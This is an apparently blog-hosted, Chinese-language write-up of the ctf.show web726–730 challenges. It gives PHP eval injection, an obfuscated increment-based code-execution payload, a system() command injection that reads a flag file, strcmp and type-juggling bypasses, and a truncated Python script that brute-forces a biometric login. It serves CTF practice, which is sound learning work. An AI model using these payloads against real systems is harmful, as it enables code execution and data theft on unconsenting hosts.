因为题目较多,所以很多地方写的比较简略,望师傅们谅解,祝大家变得更强!
文章目录
web726
username=;eval($_POST[1]);phpinfo();//
username=%00
同之前的web692
web727
自增绕过
$_=[];$_=$_.'';$_=$_[';'=='$'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);
传入code=xxx&_=phpinfo();
不要忘了url编码
web728
flag在template目录下
code=',system('cat t*/f*'));//
相当于
strpos('',system('cat t*/f*'));//', '..') === false
strpos('',system('cat t*/f*'));
web729
strcmp可以用数组绕过
下面的是要求输入的secret长度为21,大小等于6543
直接往后面堆0就可以了。
GET:
?secret=6543.0000000000000000
POST:
flag[]=1
web730
https://github.com/osirislab/CSAW-CTF-2019-Finals/blob/0f9de48efda520134bfbe3f9b674ec19a4955057/web/biometric/main.py
题目更像是一个密码学题。。。。。(让人头大)
只能直接给大家奉上wp了。
import requests
import numpy as np
from scipy.optimize import minimize
def main():
x0 = np.zeros([128]).tolist()
res = minimize(get_score, x0, method='CG', options={
'xtol': 1e-7, 'disp': True})
print(res)
res = get_request(res.x)
print(res)
def get_request(encoding) -> str:
payload = {
"username": "admin", "encoding": encoding.tolist()}
#print(encoding.tolist())
res = requests.post("http://157d4038-cd05-4438-b0fd-632e2a5eb195.challenge.ctf.show/", json=payload)
return res.content
def get_score(encoding)-> float:
content = get_request(encoding)
if str(content).find("Login Failed")

本文介绍了多个关于Web安全的题目,涉及PHP自增绕过、文件包含、模板注入、SQL注入、hash碰撞等技术,通过实例展示了如何利用这些技巧获取敏感信息或执行命令。同时,提到了一些解密、文件下载和源码分析的方法,帮助读者深入理解Web安全攻防。
最低0.47元/天 解锁文章
1120

被折叠的 条评论
为什么被折叠?



